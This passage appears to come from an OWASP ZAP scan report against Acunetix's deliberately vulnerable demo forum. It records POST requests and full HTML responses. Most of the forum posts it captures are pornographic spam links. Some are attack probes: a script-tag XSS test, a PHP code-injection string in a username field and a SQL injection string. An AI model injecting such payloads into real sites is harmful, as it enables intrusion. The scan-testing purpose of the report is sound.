Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3468 |
| Response Body - size: 3,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3357 |
| Response Body - size: 3,357 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3406 |
| Response Body - size: 3,406 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3109 |
| Response Body - size: 3,109 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3356 |
| Response Body - size: 3,356 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3309 |
| Response Body - size: 3,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This 